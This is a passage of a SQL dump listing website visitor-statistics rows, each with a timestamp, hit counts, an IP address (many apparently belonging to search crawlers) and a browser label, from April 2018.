'other'),(234776,1524274893,1,1,0,0,'207.46.13.97','other'),(234777,1524275181,1,0,1,0,'66.249.69.41',''),(234778,1524275215,1,1,0,0,'8.29.198.25','other'),(234779,1524275474,2,2,0,0,'91.209.11.236','other'),(234780,1524275896,1,0,1,0,'66.249.69.39',''),(234781,1524276226,1,1,0,0,'216.244.66.237','other'),(234782,1524276379,2,2,0,0,'178.154.171.88','other'),(234783,1524276799,1,1,0,0,'91.209.11.236','other'),(234784,1524278300,1,1,0,0,'217.69.133.5','other'),(234785,1524278563,1,1,0,0,'91.209.11.236','other'),(234786,1524280355,2,1,1,0,'66.249.69.35',''),(234787,1524280612,1,1,0,0,'91.209.11.236','other'),(234788,1524281278,1,1,0,0,'141.8.142.74','other'),(234789,1524281427,1,1,0,0,'8.29.198.25','other'),(234790,1524281472,1,1,0,0,'207.46.13.28','other'),(234791,1524281709,1,1,0,0,'91.196.178.99','chrome'),(234792,1524281807,1,1,0,0,'40.77.167.21','other'),(234793,1524282256,1,1,0,0,'91.209.11.236','other'),(234794,1524283242,1,1,0,0,'141.8.142.74','other'),(234795,1524284093,1,1,0,0,'91.209.11.236','other'),(234796,1524285160,1,1,0,0,'217.69.133.237','other'),(234797,1524285903,1,1,0,0,'91.209.11.236','other'),(234798,1524286048,1,1,0,0,'8.29.198.26','other'),(234799,1524286735,1,1,0,0,'193.106.30.99','firefox'),(234800,1524287585,1,1,0,0,'91.209.11.236','other'),(234801,1524288346,1,1,0,0,'216.244.66.237','other'),(234802,1524288650,1,1,0,0,'178.154.171.88','other'),(234803,1524288862,1,1,0,0,'66.249.69.35','chrome'),(234804,1524289095,1,1,0,0,'40.77.167.21','other'),(234805,1524289617,1,1,0,0,'91.209.11.236','other'),(234806,1524289697,2,2,0,0,'216.244.66.237','other'),(234807,1524289791,1,1,0,0,'217.69.133.5','other'),(234808,1524289908,30,30,0,0,'62.210.157.129','other'),(234809,1524290164,1,0,1,0,'66.249.69.35',''),(234810,1524290262,2,2,0,0,'40.77.167.198','other'),(234811,1524290562,1,1,0,0,'40.77.167.113','other'),(234812,1524290808,1,1,0,0,'35.226.23.240','other'),(234813,1524290869,2,2,0,0,'141.8.142.74','other'),(234814,1524291249,1,1,0,0,'178.154.171.88','other'),(234815,1524291308,1,1,0,0,'91.209.11.236','other'),(234816,1524291376,1,0,1,0,'66.249.69.35',''),(234817,1524292091,2,2,0,0,'141.8.142.74','other'),(234818,1524292260,1,1,0,0,'8.29.198.26','other'),(234819,1524292860,1,0,1,0,'66.249.69.41',''),(234820,1524292951,1,0,1,0,'66.249.69.39',''),(234821,1524292981,1,1,0,0,'91.209.11.236','other'),(234822,1524293537,1,1,0,0,'207.46.13.52','other'),(234823,1524293869,1,1,0,0,'216.244.66.237','other'),(234824,1524294154,1,0,1,0,'66.249.69.35',''),(234825,1524294793,1,1,0,0,'216.244.66.237','other'),(234826,1524295806,1,1,0,0,'216.244.66.237','other'),(234827,1524295903,1,1,0,0,'217.69.133.3','other'),(234828,1524296232,1,1,0,0,'157.55.39.130','other'),(234829,1524296429,1,1,0,0,'91.209.11.236','other'),(234830,1524296890,1,1,0,0,'8.29.198.26','other'),(234831,1524297378,1,1,0,0,'217.69.133.10','other'),(234832,1524297882,2,2,0,0,'141.8.142.74','other'),(234833,1524298416,1,1,0,0,'91.209.11.236','other'),(234834,1524298867,2,2,0,0,'95.213.141.126','opera'),(234835,1524299497,1,1,0,0,'40.77.167.21','other'),(234836,1524299539,1,1,0,0,'180.76.15.161','other'),(234837,1524299975,1,1,0,0,'204.79.180.10','msie'),(234838,1524300012,1,1,0,0,'216.244.66.237','other'),(234839,1524300292,1,1,0,0,'91.209.11.236','other'),(234840,1524300950,1,1,0,0,'141.8.142.74','other'),(234841,1524301468,1,1,0,0,'217.69.133.3','other'),(234842,1524302120,1,1,0,0,'91.209.11.236','other'),(234843,1524302399,1,1,0,0,'207.46.13.28','other'),(234844,1524303087,1,1,0,0,'8.29.198.27','other'),(234845,1524303183,1,1,0,0,'141.8.142.74','other'),(234846,1524303635,2,0,2,0,'66.249.69.41',''),(234847,1524303672,2,2,0,0,'66.249.69.89','chrome'),(234848,1524303911,1,1,0,0,'216.244.66.237','other'),(234849,1524304072,1,1,0,0,'66.249.69.39','chrome'),(234850,1524304211,1,1,0,0,'141.8.142.74','other'),(234851,1524306061,1,1,0,0,'141.8.142.74','other'),(234852,1524306103,1,1,0,0,'216.244.66.237','other'),(234853,1524306368,1,1,0,0,'87.250.224.46','other'),(234854,1524306432,1,1,0,0,'82.117.238.161','firefox'),(234855,1524306967,1,1,0,0,'217.69.133.240','other'),(234856,1524307034,1,1,0,0,'66.249.69.41','chrome'),(234857,1524307227,1,1,0,0,'66.249.69.39','chrome'),(234858,1524307740,1,1,0,0,'8.29.198.27','other'),(234859,1524307749,1,1,0,0,'141.8.142.74','other'),(234860,1524308740,1,1,0,0,'66.249.69.93','chrome'),(234861,1524309891,1,1,0,0,'54.165.59.7','other'),(234862,1524310492,1,1,0,0,'178.154.171.88','other'),(234863,1524311240,1,0,1,0,'66.249.69.39',''),(234864,1524312716,1,1,0,0,'217.69.133.240','other'),(234865,1524313665,1,1,0,0,'216.244.66.237','other'),(234866,1524313918,1,1,0,0,'8.29.198.27','other'),(234867,1524314083,1,1,0,0,'157.55.39.130','other'),(234868,1524315068,1,1,0,0,'216.244.66.237','other'),(234869,1524316052,1,1,0,0,'66.249.69.89','chrome'),(234870,1524316201,1,1,0,0,'207.46.13.52','other'),(234871,1524316376,1,0,1,0,'66.249.69.41',''),(234872,1524316498,1,1,0,0,'157.55.39.130','other'),(234873,1524316787,1,1,0,0,'178.154.171.88','other'),(234874,1524317600,2,2,0,0,'91.196.178.163','chrome'),(234875,1524317967,1,1,0,0,'141.8.142.74','other'),(234876,1524318588,1,1,0,0,'8.29.198.27','other'),(234877,1524318820,1,1,0,0,'180.76.15.32','other'),(234878,1524318962,1,1,0,0,'141.8.142.74','other'),(234879,1524320623,1,1,0,0,'216.244.66.237','other'),(234880,1524320640,1,1,0,0,'217.69.133.229','other'),(234881,1524321412,1,1,0,0,'141.8.142.74','other'),(234882,1524322384,1,1,0,0,'216.244.66.237','other'),(234883,1524322571,1,1,0,0,'178.154.171.88','other'),(234884,1524322838,1,1,0,0,'35.226.23.240','other'),(234885,1524322879,1,0,1,0,'66.249.69.35',''),(234886,1524322950,1,1,0,0,'157.55.39.130','other'),(234887,1524323543,2,2,0,0,'178.154.171.88','other'),(234888,1524324354,1,1,0,0,'180.76.15.140','other'),(234889,1524324751,1,1,0,0,'8.29.198.26','other'),(234890,1524324780,1,1,0,0,'66.249.69.35','chrome'),(234891,1524324956,2,2,0,0,'216.244.66.237','other'),(234892,1524325956,1,1,0,0,'35.226.23.240','other'),(234893,1524326238,1,1,0,0,'193.106.30.99','firefox'),(234894,1524326481,1,1,0,0,'216.244.66.237','other'),(234895,1524327008,1,1,0,0,'180.76.15.142','other'),(234896,1524327037,1,1,0,0,'217.69.133.253','other'),(234897,1524327369,1,1,0,0,'141.8.142.74','other'),(234898,1524327834,1,1,0,0,'40.77.167.111','other'),(234899,1524328297,1,1,0,0,'91.196.178.133','firefox'),(234900,1524328440,2,2,0,0,'178.154.171.88','other'),(234901,1524328809,1,1,0,0,'40.77.167.111','other'),(234902,1524329009,1,1,0,0,'180.76.15.134','other'),(234903,1524329425,1,1,0,0,'8.29.198.26','other'),(234904,1524330515,1,1,0,0,'217.69.133.216','other'),(234905,1524332414,1,1,0,0,'216.244.66.237','other'),(234906,1524332438,1,1,0,0,'141.8.142.152','other'),(234907,1524332441,1,1,0,0,'178.154.200.28','other'),(234908,1524332442,1,1,0,0,'37.9.113.60','other'),(234909,1524333373,1,1,0,0,'216.244.66.237','other'),(234910,1524333461,1,1,0,0,'141.8.142.74','other'),(234911,1524333486,3,0,3,0,'66.249.69.41',''),(234912,1524333674,1,1,0,0,'192.162.140.180','firefox'),(234913,1524333781,1,1,0,0,'178.154.171.88','other'),(234914,1524335225,1,1,0,0,'91.209.11.236','other'),(234915,1524335595,1,1,0,0,'8.29.198.25','other'),(234916,1524336054,1,0,1,0,'66.249.69.39',''),(234917,1524336458,1,1,0,0,'162.210.196.97','other'),(234918,1524337333,1,1,0,0,'46.101.142.145','chrome'),(234919,1524337998,1,1,0,0,'178.154.171.88','other'),(234920,1524338002,1,1,0,0,'141.8.142.74','other'),(234921,1524338604,1,1,0,0,'40.77.167.111','other'),(234922,1524339004,1,0,1,0,'66.249.69.35',''),(234923,1524339716,1,1,0,0,'216.244.66.237','other'),(234924,1524339838,1,1,0,0,'178.154.171.88','other'),(234925,1524340277,1,1,0,0,'8.29.198.27','other'),(234926,1524340611,1,1,0,0,'35.226.23.240','other'),(234927,1524340632,1,1,0,0,'216.244.66.237','other'),(234928,1524340727,1,1,0,0,'109.173.59.251','msie'),(234929,1524340989,1,0,1,0,'66.249.69.89',''),(234930,1524341059,1,1,0,0,'193.106.30.99','firefox'),(234931,1524341143,2,2,0,0,'91.196.178.163','chrome'),(234932,1524342198,1,1,0,0,'40.77.167.148','other'),(234933,1524342407,1,0,1,0,'66.249.69.39',''),(234934,1524344145,1,0,1,0,'66.249.69.41',''),(234935,1524344952,1,1,0,0,'207.46.13.28','other'),(234936,1524344964,1,1,0,0,'178.154.171.88','other'),(234937,1524345424,1,1,0,0,'46.161.9.39','chrome'),(234938,1524345744,2,2,0,0,'141.8.142.74','other'),(234939,1524346045,1,0,1,0,'66.249.66.195',''),(234940,1524346432,1,1,0,0,'8.29.198.27','other'),(234941,1524347340,1,1,0,0,'157.55.39.130','other'),(234942,1524347467,1,1,0,0,'141.8.142.74','other'),(234943,1524347498,1,1,0,0,'207.46.13.52','other'),(234944,1524348307,1,1,0,0,'54.67.59.131','chrome'),(234945,1524348816,1,1,0,0,'207.46.13.52','other'),(234946,1524349540,1,1,0,0,'66.249.66.199','chrome'),(234947,1524350049,1,1,0,0,'217.69.133.85','other'),(234948,1524351110,1,1,0,0,'8.29.198.26','other'),(234949,1524351597,1,1,0,0,'216.244.66.237','other'),(234950,1524352844,1,1,0,0,'207.46.13.52','other'),(234951,1524353262,1,1,0,0,'216.244.66.237','other'),(234952,1524353507,1,1,0,0,'157.55.39.130','other'),(234953,1524353668,1,0,1,0,'66.249.66.195',''),(234954,1524353800,1,0,1,0,'66.249.66.199',''),(234955,1524355576,1,1,0,0,'46.161.9.39','chrome'),(234956,1524356838,1,1,0,0,'141.8.142.74','other'),(234957,1524357080,1,1,0,0,'207.46.13.52','other'),(234958,1524357264,1,1,0,0,'8.29.198.27','other'),(234959,1524357750,1,1,0,0,'66.249.66.156','chrome'),(234960,1524358693,1,1,0,0,'217.69.143.70','other'),(234961,1524358902,1,1,0,0,'216.244.66.237','other'),(234962,1524359713,2,0,2,0,'66.249.66.195',''),(234963,1524360170,1,0,1,0,'66.249.66.201',''),(234964,1524360562,1,1,0,0,'216.244.66.237','other'),(234965,1524361073,1,1,0,0,'217.69.133.216','other'),(234966,1524361925,1,1,0,0,'66.249.66.195','chrome'),(234967,1524361946,1,1,0,0,'8.29.198.26','other'),(234968,1524363008,1,1,0,0,'66.249.66.199','chrome'),(234969,1524364104,1,0,1,0,'66.249.66.199',''),(234970,1524364201,1,1,0,0,'217.69.133.194','other'),(234971,1524364784,1,1,0,0,'216.244.66.237','other'),(234972,1524366888,1,0,1,0,'66.249.66.201',''),(234973,1524366955,1,1,0,0,'157.55.39.130','other'),(234974,1524367493,1,1,0,0,'46.242.65.210','msie'),(234975,1524368085,1,1,0,0,'8.29.198.27','other'),(234976,1524368204,1,1,0,0,'180.76.15.152','other'),(234977,1524369261,2,0,2,0,'66.249.66.199',''),(234978,1524370409,1,1,0,0,'217.69.133.194','other'),(234979,1524370757,1,1,0,0,'216.244.66.237','other'),(234980,1524371062,1,0,1,0,'66.249.66.195',''),(234981,1524371099,1,1,0,0,'91.209.11.236','other'),(234982,1524371881,1,1,0,0,'40.77.167.120','other'),(234983,1524372304,1,0,1,0,'66.249.66.201',''),(234984,1524372775,1,1,0,0,'8.29.198.25','other'),(234985,1524373530,3,0,3,0,'66.249.66.201',''),(234986,1524373942,1,1,0,0,'141.8.142.74','other'),(234987,1524375004,1,1,0,0,'207.46.13.52','other'),(234988,1524375660,1,1,0,0,'141.8.142.74','other'),(234989,1524376300,2,0,2,0,'66.249.66.201',''),(234990,1524376929,1,0,1,0,'66.249.66.199',''),(234991,1524377279,1,1,0,0,'178.154.171.88','other'),(234992,1524378092,1,1,0,0,'37.9.113.182','other'),(234993,1524378095,1,1,0,0,'66.249.66.158','chrome'),(234994,1524378150,1,1,0,0,'216.244.66.237','other'),(234995,1524378254,1,1,0,0,'193.106.30.99','firefox'),(234996,1524378881,1,1,0,0,'141.8.142.74','other'),(234997,1524378915,1,1,0,0,'8.29.198.25','other'),(234998,1524379008,1,1,0,0,'46.211.159.138','chrome'),(234999,1524379056,2,2,0,0,'207.46.13.52','other'),(235000,1524379560,1,1,0,0,'66.249.66.201','chrome'),(235001,1524379905,1,1,0,0,'91.214.209.229','chrome'),(235002,1524380059,1,1,0,0,'141.8.142.74','other'),(235003,1524380224,1,1,0,0,'54.165.59.7','other'),(235004,1524381608,1,1,0,0,'40.77.167.86','other'),(235005,1524381674,2,0,2,0,'66.249.66.195',''),(235006,1524381688,1,1,0,0,'180.76.15.23','other'),(235007,1524382169,1,1,0,0,'216.244.66.237','other'),(235008,1524382368,1,0,1,0,'66.249.66.201',''),(235009,1524382874,1,1,0,0,'207.46.13.52','other'),(235010,1524382944,1,1,0,0,'141.8.142.74','other'),(235011,1524383604,1,1,0,0,'8.29.198.27','other'),(235012,1524384117,1,1,0,0,'35.226.23.240','other'),(235013,1524384610,1,1,0,0,'157.55.39.130','other'),(235014,1524384618,1,1,0,0,'128.69.222.231','chrome'),(235015,1524385111,1,1,0,0,'66.249.66.157','chrome'),(235016,1524385156,1,1,0,0,'66.249.66.201','chrome'),(235017,1524385689,1,0,1,0,'66.249.66.195',''),(235018,1524385929,1,0,1,0,'66.249.66.199',''),(235019,1524386289,1,1,0,0,'173.212.233.72','other'),(235020,1524386291,1,1,0,0,'173.212.233.72','msie'),(235021,1524386611,1,1,0,0,'217.69.133.203','other'),(235022,1524386684,1,1,0,0,'216.244.66.237','other'),(235023,1524386718,2,2,0,0,'94.178.147.1','chrome'),(235024,1524386855,1,1,0,0,'178.154.171.88','other'),(235025,1524387087,1,1,0,0,'62.4.15.64','chrome'),(235026,1524387472,1,1,0,0,'217.69.133.2','other'),(235027,1524387579,2,0,2,0,'66.249.66.199',''),(235028,1524387599,1,1,0,0,'217.69.133.203','other'),(235029,1524389740,1,1,0,0,'8.29.198.26','other'),(235030,1524389819,1,1,0,0,'217.69.133.194','other'),(235031,1524390842,1,1,0,0,'141.8.142.74','other'),(235032,1524390920,1,1,0,0,'37.190.163.241','chrome'),(235033,1524391156,1,0,1,0,'66.249.66.201',''),(235034,1524391462,1,1,0,0,'216.244.66.237','other'),(235035,1524391516,1,0,1,0,'66.249.66.199',''),(235036,1524392340,1,1,0,0,'66.249.66.195','chrome'),(235037,1524392397,1,1,0,0,'66.249.66.158','chrome'),(235038,1524392794,1,1,0,0,'91.209.11.236','other'),(235039,1524393308,1,0,1,0,'66.249.66.201',''),(235040,1524393455,1,0,1,0,'66.249.66.195',''),(235041,1524393700,1,1,0,0,'40.77.167.86','other'),(235042,1524394092,89,89,0,0,'81.109.85.9','other'),(235043,1524394435,1,1,0,0,'8.29.198.26','other'),(235044,1524394442,1,0,1,0,'66.249.66.201',''),(235045,1524394620,1,1,0,0,'178.154.171.88','other'),(235046,1524394810,1,1,0,0,'178.255.215.94','other'),(235047,1524394996,1,1,0,0,'141.8.142.74','other'),(235048,1524395466,1,1,0,0,'199.58.86.206','other'),(235049,1524396613,1,0,1,0,'66.249.66.199',''),(235050,1524397429,1,1,0,0,'216.244.66.237','other'),(235051,1524397680,1,1,0,0,'178.154.171.88','other'),(235052,1524397704,3,3,0,0,'91.214.209.229','chrome'),(235053,1524397920,1,1,0,0,'66.249.66.195','chrome'),(235054,1524397927,1,1,0,0,'66.249.66.158','chrome'),(235055,1524398517,1,1,0,0,'141.8.142.74','other'),(235056,1524398850,1,0,1,0,'66.249.66.195',''),(235057,1524398922,1,1,0,0,'207.46.13.52','other'),(235058,1524399075,1,1,0,0,'216.244.66.237','other'),(235059,1524399987,1,1,0,0,'178.154.171.88','other'),(235060,1524400321,1,1,0,0,'216.244.66.237','other'),(235061,1524400579,1,1,0,0,'8.29.198.25','other'),(235062,1524402556,1,1,0,0,'40.77.167.86','other'),(235063,1524403234,1,1,0,0,'216.244.66.237','other'),(235064,1524403429,2,0,2,0,'66.249.66.157',''),(235065,1524404135,85,85,0,0,'192.151.157.210','other'),(235066,1524404591,1,1,0,0,'141.8.142.74','other'),(235067,1524404748,1,1,0,0,'180.76.15.137','other'),(235068,1524405018,2,2,0,0,'91.196.178.26','chrome'),(235069,1524405286,1,1,0,0,'8.29.198.26','other'),(235070,1524406013,1,1,0,0,'216.244.66.237','other'),(235071,1524406461,1,1,0,0,'141.8.142.74','other'),(235072,1524406468,1,1,0,0,'66.249.66.195','chrome'),(235073,1524406475,1,1,0,0,'66.249.66.157','chrome'),(235074,1524406908,1,0,1,0,'66.249.66.156',''),(235075,1524407539,1,1,0,0,'216.244.66.237','other'),(235076,1524407606,1,1,0,0,'157.55.39.130','other'),(235077,1524407918,1,0,1,0,'66.249.66.199',''),(235078,1524408027,1,1,0,0,'91.209.11.236','other'),(235079,1524408393,1,0,1,0,'66.249.66.195',''),(235080,1524408435,1,1,0,0,'178.154.171.88','other'),(235081,1524408937,1,1,0,0,'91.209.11.236','other'),(235082,1524410230,1,1,0,0,'141.8.142.74','other'),(235083,1524410628,1,1,0,0,'91.209.11.236','other'),(235084,1524410644,1,1,0,0,'217.69.133.203','other'),(235085,1524410749,1,1,0,0,'217.69.133.3','other'),(235086,1524410867,2,0,2,0,'66.249.66.201',''),(235087,1524411439,1,1,0,0,'8.29.198.26','other'),(235088,1524411874,1,1,0,0,'66.249.66.201','chrome'),(235089,1524411878,1,1,0,0,'66.249.66.156','chrome'),(235090,1524411880,1,1,0,0,'216.244.66.237','other'),(235091,1524411887,1,1,0,0,'35.226.23.240','other'),(235092,1524412435,1,0,1,0,'66.249.66.157',''),(235093,1524413111,1,1,0,0,'37.9.113.182','other'),(235094,1524413481,1,1,0,0,'207.46.13.52','other'),(235095,1524413921,1,1,0,0,'178.154.171.88','other'),(235096,1524414496,1,1,0,0,'157.55.39.235','other'),(235097,1524414559,1,0,1,0,'66.249.66.201',''),(235098,1524414962,1,0,1,0,'66.249.66.199',''),(235099,1524415753,1,1,0,0,'87.250.224.46','other'),(235100,1524415903,1,0,1,0,'66.249.66.199',''),(235101,1524416115,1,1,0,0,'8.29.198.27','other'),(235102,1524416184,1,1,0,0,'40.77.167.86','other'),(235103,1524417143,2,2,0,0,'91.196.178.26','chrome'),(235104,1524417335,1,1,0,0,'66.249.66.156','chrome'),(235105,1524417421,1,1,0,0,'35.226.23.240','other'),(235106,1524417714,1,1,0,0,'66.249.66.199','chrome'),(235107,1524418331,1,1,0,0,'46.101.60.142','other'),(235108,1524418955,1,0,1,0,'66.249.66.195',''),(235109,1524419090,1,1,0,0,'162.210.196.97','other'),(235110,1524419429,1,0,1,0,'66.249.66.156',''),(235111,1524419799,1,1,0,0,'141.8.142.74','other'),(235112,1524420023,1,0,1,0,'66.249.66.201',''),(235113,1524421127,1,1,0,0,'207.46.13.52','other'),(235114,1524422282,1,1,0,0,'8.29.198.26','other'),(235115,1524422285,2,2,0,0,'157.55.39.235','other'),(235116,1524422423,1,1,0,0,'66.249.66.201','chrome'),(235117,1524422613,1,1,0,0,'141.8.142.74','other'),(235118,1524422677,1,1,0,0,'66.249.66.157','chrome'),(235119,1524424109,1,1,0,0,'40.77.167.86','other'),(235120,1524424255,1,1,0,0,'91.196.178.69','chrome'),(235121,1524424988,1,1,0,0,'216.244.66.237','other'),(235122,1524425280,1,0,1,0,'66.249.66.201',''),(235123,1524425301,1,1,0,0,'157.55.39.130','other'),(235124,1524425334,1,0,1,0,'66.249.66.199',''),(235125,1524426280,1,0,1,0,'66.249.66.158',''),(235126,1524426887,2,0,2,0,'66.249.66.195',''),(235127,1524426949,1,1,0,0,'8.29.198.27','other'),(235128,1524427781,1,1,0,0,'66.249.66.195','chrome'),(235129,1524427816,1,1,0,0,'66.249.66.156','chrome'),(235130,1524428959,1,1,0,0,'216.244.66.237','other'),(235131,1524428996,14,14,0,0,'54.198.134.127','other'),(235132,1524429242,1,1,0,0,'217.69.133.225','other'),(235133,1524429921,1,1,0,0,'46.161.9.39','firefox'),(235134,1524431487,1,0,1,0,'66.249.66.195',''),(235135,1524432109,1,1,0,0,'216.244.66.237','other'),(235136,1524432379,1,1,0,0,'141.8.142.74','other'),(235137,1524433110,1,1,0,0,'8.29.198.27','other'),(235138,1524433615,1,1,0,0,'185.224.133.183','chrome'),(235139,1524433815,2,1,1,0,'66.249.66.195',''),(235140,1524433827,1,1,0,0,'66.249.66.158','chrome'),(235141,1524434232,1,1,0,0,'35.226.23.240','other'),(235142,1524435143,1,0,1,0,'66.249.66.195',''),(235143,1524435292,1,1,0,0,'141.8.142.74','other'),(235144,1524435664,1,0,1,0,'66.249.66.199',''),(235145,1524435685,1,1,0,0,'217.69.133.216','other'),(235146,1524436223,1,1,0,0,'66.249.66.157','chrome'),(235147,1524436930,2,2,0,0,'141.8.142.74','other'),(235148,1524437775,1,1,0,0,'213.180.203.8','other'),(235149,1524437778,1,1,0,0,'8.29.198.26','other'),(235150,1524439063,1,1,0,0,'157.55.39.130','other'),(235151,1524439090,1,1,0,0,'87.250.224.46','other'),(235152,1524439147,1,1,0,0,'216.244.66.237','other'),(235153,1524439731,1,0,1,0,'66.249.66.199',''),(235154,1524439824,1,1,0,0,'178.154.171.88','other'),(235155,1524439849,1,1,0,0,'66.249.66.199','chrome'),(235156,1524439855,1,1,0,0,'66.249.66.157','chrome'),(235157,1524441177,1,1,0,0,'35.226.23.240','other'),(235158,1524441932,1,1,0,0,'37.204.134.9','chrome'),(235159,1524442158,1,1,0,0,'180.76.15.8','other'),(235160,1524442199,1,0,1,0,'66.249.66.156',''),(235161,1524442201,1,1,0,0,'207.46.13.157','other'),(235162,1524442268,2,2,0,0,'216.244.66.237','other'),(235163,1524443936,1,1,0,0,'8.29.198.25','other'),(235164,1524444503,1,1,0,0,'178.154.171.88','other'),(235165,1524445900,1,1,0,0,'91.209.11.236','other'),(235166,1524447133,1,1,0,0,'216.244.66.237','other'),(235167,1524448067,1,0,1,0,'66.249.66.201',''),(235168,1524448091,1,1,0,0,'217.69.133.215','other'),(235169,1524448096,1,1,0,0,'66.249.66.195','chrome'),(235170,1524448102,1,1,0,0,'66.249.66.157','chrome'),(235171,1524448608,1,1,0,0,'8.29.198.27','other'),(235172,1524449235,1,1,0,0,'141.8.142.74','other'),(235173,1524450926,1,1,0,0,'178.154.171.88','other'),(235174,1524451377,1,1,0,0,'216.244.66.237','other'),(235175,1524451378,1,1,0,0,'188.32.41.196','msie'),(235176,1524451432,1,1,0,0,'54.165.59.7','other'),(235177,1524452228,1,1,0,0,'141.8.142.74','other'),(235178,1524453112,2,1,1,0,'66.249.66.157',''),(235179,1524454774,1,1,0,0,'8.29.198.25','other'),(235180,1524454961,1,1,0,0,'141.8.142.74','other'),(235181,1524455765,1,1,0,0,'46.161.9.31','firefox'),(235182,1524457712,1,0,1,0,'66.249.66.199',''),(235183,1524458445,1,1,0,0,'157.55.39.130','other'),(235184,1524458537,1,1,0,0,'141.8.142.74','other'),(235185,1524458590,1,1,0,0,'66.249.66.156','chrome'),(235186,1524459436,1,1,0,0,'8.29.198.27','other'),(235187,1524459623,1,1,0,0,'87.250.224.46','other'),(235188,1524460330,1,1,0,0,'66.249.66.201','chrome'),(235189,1524460398,1,1,0,0,'95.135.30.8','chrome'),(235190,1524460410,2,2,0,0,'91.196.178.82','chrome'),(235191,1524461011,1,1,0,0,'178.154.171.88','other'),(235192,1524462390,1,1,0,0,'91.196.178.135','chrome'),(235193,1524462459,1,1,0,0,'35.226.23.240','other'),(235194,1524462529,3,3,0,0,'92.113.188.198','chrome'),(235195,1524462851,1,1,0,0,'216.244.66.237','other'),(235196,1524463625,2,2,0,0,'91.214.209.229','chrome'),(235197,1524464173,1,0,1,0,'66.249.66.195',''),(235198,1524464264,1,1,0,0,'37.55.112.132','chrome'),(235199,1524464538,1,1,0,0,'91.214.209.229','chrome'),(235200,1524465335,1,1,0,0,'141.8.142.74','other'),(235201,1524465600,1,1,0,0,'8.29.198.25','other'),(235202,1524467239,2,2,0,0,'91.196.177.46','chrome'),(235203,1524467493,1,1,0,0,'95.132.4.167','firefox'),(235204,1524467597,1,1,0,0,'157.55.39.235','other'),(235205,1524467686,1,1,0,0,'91.196.178.102','chrome'),(235206,1524468526,1,1,0,0,'216.244.66.237','other'),(235207,1524468818,2,2,0,0,'91.196.178.82','chrome'),(235208,1524469018,1,1,0,0,'62.205.134.182','other'),(235209,1524469484,1,1,0,0,'91.196.178.103','chrome'),(235210,1524469811,1,1,0,0,'207.46.13.52','other'),(235211,1524470259,1,1,0,0,'8.29.198.25','other'),(235212,1524470370,1,1,0,0,'91.196.178.161','chrome'),(235213,1524470820,3,3,0,0,'91.196.177.46','chrome'),(235214,1524470969,1,1,0,0,'66.249.66.156','chrome'),(235215,1524471010,1,1,0,0,'66.249.66.199','chrome'),(235216,1524471099,2,2,0,0,'195.201.128.10','other'),(235217,1524471366,1,1,0,0,'91.196.178.161','chrome'),(235218,1524472501,1,1,0,0,'107.167.104.69','other'),(235219,1524472613,1,1,0,0,'82.207.91.234','other'),(235220,1524472698,1,1,0,0,'141.8.142.74','other'),(235221,1524472918,1,1,0,0,'178.92.140.21','firefox'),(235222,1524473868,1,1,0,0,'91.196.178.80','firefox'),(235223,1524473987,1,0,1,0,'66.249.66.201',''),(235224,1524474209,1,1,0,0,'128.72.238.165','msie'),(235225,1524474852,1,1,0,0,'216.244.66.237','other'),(235226,1524474995,1,1,0,0,'207.46.13.52','other'),(235227,1524475176,1,1,0,0,'128.74.246.62','msie'),(235228,1524475469,5,5,0,0,'91.196.178.90','chrome'),(235229,1524475966,2,2,0,0,'130.180.220.253','chrome'),(235230,1524476011,1,1,0,0,'216.244.66.237','other'),(235231,1524476079,1,1,0,0,'46.242.118.111','msie'),(235232,1524476317,1,1,0,0,'66.249.66.157','chrome'),(235233,1524476329,1,1,0,0,'66.249.66.195','chrome'),(235234,1524476427,1,1,0,0,'8.29.198.25','other'),(235235,1524476669,1,1,0,0,'46.242.119.115','msie'),(235236,1524476686,1,1,0,0,'178.154.171.88','other'),(235237,1524477315,1,1,0,0,'92.112.109.155','firefox'),(235238,1524477318,1,1,0,0,'176.14.34.104','msie'),(235239,1524477331,1,1,0,0,'91.196.177.46','chrome'),(235240,1524477772,1,1,0,0,'77.111.244.50','chrome'),(235241,1524478474,1,1,0,0,'5.45.207.82','other'),(235242,1524479337,1,0,1,0,'66.249.66.195',''),(235243,1524480319,1,1,0,0,'46.211.106.93','chrome'),(235244,1524481090,1,1,0,0,'8.29.198.27','other'),(235245,1524481256,1,1,0,0,'80.91.174.42','chrome'),(235246,1524481478,1,1,0,0,'35.226.23.240','other'),(235247,1524482027,1,1,0,0,'66.249.66.199','chrome'),(235248,1524482671,1,1,0,0,'212.1.94.238','chrome'),(235249,1524482699,1,1,0,0,'178.154.171.88','other'),(235250,1524483193,1,1,0,0,'91.196.178.166','chrome'),(235251,1524483216,1,1,0,0,'217.69.133.2','other'),(235252,1524483640,1,1,0,0,'91.196.178.85','firefox'),(235253,1524483737,1,1,0,0,'141.8.142.74','other'),(235254,1524483831,1,1,0,0,'66.249.66.156','chrome'),(235255,1524484001,1,1,0,0,'180.76.15.147','other'),(235256,1524484182,1,1,0,0,'157.55.39.130','other'),(235257,1524484250,2,2,0,0,'162.210.196.100','other'),(235258,1524484261,1,1,0,0,'87.250.224.46','other'),(235259,1524484770,1,1,0,0,'128.74.245.93','msie'),(235260,1524484838,1,1,0,0,'216.244.66.237','other'),(235261,1524485082,2,0,2,0,'66.249.66.195',''),(235262,1524485473,1,1,0,0,'141.8.142.74','other'),(235263,1524485726,1,1,0,0,'95.28.165.113','msie'),(235264,1524486202,1,1,0,0,'216.244.66.237','other'),(235265,1524486711,1,1,0,0,'91.196.178.103','chrome'),(235266,1524487062,1,1,0,0,'188.32.215.168','msie'),(235267,1524487166,1,1,0,0,'217.114.234.99','msie'),(235268,1524487232,1,1,0,0,'216.244.66.237','other'),(235269,1524487281,1,1,0,0,'8.29.198.25','other'),(235270,1524487549,1,1,0,0,'66.249.66.199','chrome'),(235271,1524487855,1,1,0,0,'176.111.46.87','chrome'),(235272,1524488341,2,2,0,0,'91.196.178.82','chrome'),(235273,1524488363,1,0,1,0,'66.249.66.201',''),(235274,1524489015,1,1,0,0,'95.135.23.142','chrome'),(235275,1524489032,6,6,0,0,'94.45.121.3','chrome'),(235276,1524489056,1,1,0,0,'46.211.124.201','other'),(235277,1524489273,1,1,0,0,'66.249.66.156','chrome'),(235278,1524489658,1,1,0,0,'217.69.133.3','other'),(235279,1524489661,1,1,0,0,'37.52.46.133','chrome'),(235280,1524489832,1,1,0,0,'193.93.12.198','chrome'),(235281,1524489833,1,1,0,0,'207.46.13.52','other'),(235282,1524490998,1,0,1,0,'66.249.66.195',''),(235283,1524491135,1,1,0,0,'31.43.31.237','chrome'),(235284,1524491259,1,1,0,0,'94.179.94.17','chrome'),(235285,1524491808,1,1,0,0,'93.78.215.251','chrome'),(235286,1524491892,1,1,0,0,'216.244.66.237','other'),(235287,1524491919,1,1,0